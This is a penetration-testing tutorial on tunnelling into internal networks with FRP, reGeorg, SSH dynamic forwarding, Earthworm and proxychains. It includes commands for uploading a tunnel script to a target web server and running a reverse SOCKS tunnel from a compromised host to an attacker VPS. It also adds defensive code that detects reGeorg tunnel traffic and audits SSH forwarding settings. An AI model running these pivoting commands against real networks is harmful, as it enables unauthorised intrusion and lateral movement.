Mastering Internal Network Access: FRP, reGeorg, SSH Tunneling & Proxy Tools

This guide details multiple traffic‑proxy and port‑forwarding techniques—FRP, reGeorg + Proxifier, SSH dynamic tunnels, Earthworm with SocksCap, and proxychains-ng—providing step‑by‑step commands, configuration files, and practical examples for penetrating isolated internal networks.

Open Source Linux

During penetration testing, targets are often located behind internal networks or firewalls, requiring traffic to be proxied into the target LAN. The following methods illustrate how to achieve traffic proxying and port forwarding.

FRP Port Forwarding

FRP is a high‑performance reverse proxy that supports TCP, UDP, HTTP and HTTPS. It can map a local port to a public port, enabling reverse shells to connect back through the public address.

Download the FRP binary package:

wget https://github.com/fatedier/frp/releases/download/v0.32.0/frp_0.32.0_linux_amd64.tar.gz

Extract the archive:

tar zxf frp_0.32.0_linux_amd64.tar.gz

Enter the directory:

cd frp_0.32.0_linux_amd64/

Configure the client (frpc.ini) with server_addr set to the public IP and server_port to the communication port. For example, map port 1234 for a reverse web‑shell.

Configure the server (frps.ini) to listen on the same port: the server side sets it with bind_port, which must match the client's server_port. Start the services:

./frps -c frps.ini
./frpc -c frpc.ini

After the FRP tunnel is active, use Metasploit to listen on the local port (e.g., 1234) and generate a reverse payload pointing to the public address. The payload will connect back through the FRP tunnel.

reGeorg + Proxifier

reGeorg is an upgraded version of reDuh that forwards internal server ports over HTTP/HTTPS tunnels, creating a SOCKS proxy. It works with ASPX, PHP, or JSP back‑ends. The server component runs on the target web server, while the client (Python) listens locally and forwards traffic through the tunnel.

Typical workflow:

Upload tunnel.nosocket.php to the web root of the target.

Run the client:

python reGeorgSocksProxy.py -p 8888 -u http://192.168.114.129/tunnel.nosocket.php

Configure Proxifier to use the SOCKS5 proxy 192.168.114.129:80 and set rule groups so that only desired applications (e.g., browsers) use the proxy, while python.exe runs in direct mode to avoid loops.

Once configured, internal web services become reachable through the proxy.
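
For defenders, the tunnel described above is visible in the web server's access log as one client repeatedly hitting a single script with cmd= parameters. The following detector is an added example, not code from the original article or from the reGeorg project; the log lines are constructed, and the set of cmd values is an assumption about the stock client's query strings.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (sample data, not from the page).
SAMPLE_LOG = """\
192.168.114.1 - - [01/Jan/2024:10:00:01 +0000] "POST /tunnel.nosocket.php?cmd=connect&target=10.1.1.20&port=3389 HTTP/1.1" 200 0
192.168.114.1 - - [01/Jan/2024:10:00:01 +0000] "POST /tunnel.nosocket.php?cmd=read HTTP/1.1" 200 512
192.168.114.1 - - [01/Jan/2024:10:00:01 +0000] "POST /tunnel.nosocket.php?cmd=forward HTTP/1.1" 200 0
192.168.114.1 - - [01/Jan/2024:10:00:02 +0000] "POST /tunnel.nosocket.php?cmd=read HTTP/1.1" 200 1024
192.168.114.1 - - [01/Jan/2024:10:00:09 +0000] "POST /tunnel.nosocket.php?cmd=disconnect HTTP/1.1" 200 0
192.168.114.7 - - [01/Jan/2024:10:00:03 +0000] "GET /report.php?cmd=read&id=7 HTTP/1.1" 200 2310
192.168.114.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=home HTTP/1.1" 200 8841
"""

# Assumption: cmd values sent by the stock reGeorg client in the query string.
TUNNEL_CMDS = {"connect", "read", "forward", "disconnect"}
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_tunnel_sessions(log_text, min_hits=3):
    """Group tunnel-style requests by (client, script) and flag polling sessions."""
    hits = defaultdict(Counter)
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, uri, _status = m.groups()
        url = urlsplit(uri)
        qs = parse_qs(url.query)
        cmd = qs.get("cmd", [""])[0].lower()
        if cmd not in TUNNEL_CMDS:
            continue
        key = (client, url.path)
        hits[key][cmd] += 1
        if cmd == "connect" and "target" in qs:
            # The connect request names the internal host:port being reached.
            targets[key].add(f"{qs['target'][0]}:{qs.get('port', ['?'])[0]}")
    findings = []
    for (client, path), counts in hits.items():
        total = sum(counts.values())
        # One stray cmd= parameter is noise; repeated read/forward polling is not.
        if total >= min_hits and (counts["read"] or counts["forward"]):
            findings.append({"client": client, "path": path, "requests": total,
                             "targets": sorted(targets[(client, path)])})
    return findings

if __name__ == "__main__":
    for f in find_tunnel_sessions(SAMPLE_LOG):
        print(f)
```

The targets field lists the internal hosts the tunnel was pointed at, which gives incident responders a starting scope.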

SSH Port Forwarding

Common SSH tunnel options:

-C  Enable compression
-f  Run SSH in background
-N  Create a silent connection (no remote command)
-g  Allow remote hosts to connect to local forwarded ports
-L  Local port forwarding
-R  Remote port forwarding
-D  Dynamic (SOCKS) forwarding
-p  Specify SSH server port

Example of remote dynamic forwarding:

ssh -CfNg -D 1111 [email protected] -p 44866

This command creates a local SOCKS4/5 proxy on port 1111 that forwards traffic through the remote SSH server to the internal target.
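
The forwarding shown above only works if the SSH server acting as the relay permits it. This added example (not from the original article) audits an sshd_config for the global settings that allow -L, -D and -R tunnels; the sample config is constructed and the function names are hypothetical.

```python
# Constructed sshd_config for the relay host (sample data, not from the page).
SAMPLE_SSHD_CONFIG = """\
Port 44866
#AllowTcpForwarding no
GatewayPorts yes
GatewayPorts no
PermitTunnel no
Match User backup
    AllowTcpForwarding no
"""

# OpenSSH defaults for the forwarding keywords when the file does not set them.
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no", "permittunnel": "no"}

def effective_global_settings(text):
    """Resolve the global value of each forwarding keyword (first value wins)."""
    seen = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # a commented-out directive leaves the default in force
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break  # Match blocks apply only to selected users/hosts, not globally
        if key in DEFAULTS and len(parts) == 2 and key not in seen:
            seen[key] = parts[1].strip().lower()
    return {**DEFAULTS, **seen}

def audit_forwarding(text):
    """Return (keyword, value, risk) for every setting that allows tunneling."""
    s = effective_global_settings(text)
    findings = []
    tcp = s["allowtcpforwarding"]
    if tcp in ("yes", "all", "local"):
        findings.append(("AllowTcpForwarding", tcp, "client -L/-D forwarding is relayed"))
    if tcp in ("yes", "all", "remote"):
        findings.append(("AllowTcpForwarding", tcp, "client -R listeners are accepted"))
    if s["gatewayports"] != "no":
        findings.append(("GatewayPorts", s["gatewayports"],
                         "-R listeners can bind non-loopback addresses"))
    if s["permittunnel"] != "no":
        findings.append(("PermitTunnel", s["permittunnel"], "tun device tunnels are allowed"))
    return findings

if __name__ == "__main__":
    for finding in audit_forwarding(SAMPLE_SSHD_CONFIG):
        print(finding)
```

Setting AllowTcpForwarding no globally, and re-enabling it only inside a Match block for accounts that need it, removes the relay path for everyone else.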

Using ew + SocksCap

Earthworm (ew) is a versatile internal‑network penetration tool with binaries for Windows, Linux, macOS and ARM platforms. It can run as a forward SOCKS5 server or as a reverse SOCKS5 client.

Typical commands:

Forward SOCKS5 server (public IP target):

ew.exe -s ssocksd -l 888

Reverse SOCKS5 server (no public IP):

ew.exe -s rcsocks -l 1008 -e 888

On the server side, bind the reverse tunnel:

ew.exe -s rssocks -d 2.2.2.2 -e 888

Experimental case: a VPS without a public IP runs:

./ew -s rcsocks -l 1260 -e 1261

The attacker uploads ew.exe to the internal machine and runs:

ew.exe -s rssocks -d 148.xx.xx.xx -e 1261

The VPS then shows a successful connection, and the attacker can route traffic through SocksCap64 or configure browsers to use the SOCKS5 proxy, gaining access to internal web services.

proxychains‑ng

proxychains‑ng is an upgraded version of proxychains that can route traffic through SOCKS5 proxies. Install it from SourceForge, then configure /etc/proxychains.conf:

vi /etc/proxychains.conf
socks5 148.xx.xx.xx 1260

Test the tunnel; successful output indicates that internal services are reachable. proxychains4 combined with tools like nmap can further enumerate the internal network.

These techniques collectively enable attackers to bypass network segmentation and conduct thorough internal penetration testing.

Written by

Open Source Linux

Focused on sharing Linux/Unix content, covering fundamentals, system development, network programming, automation/operations, cloud computing, and related professional knowledge.
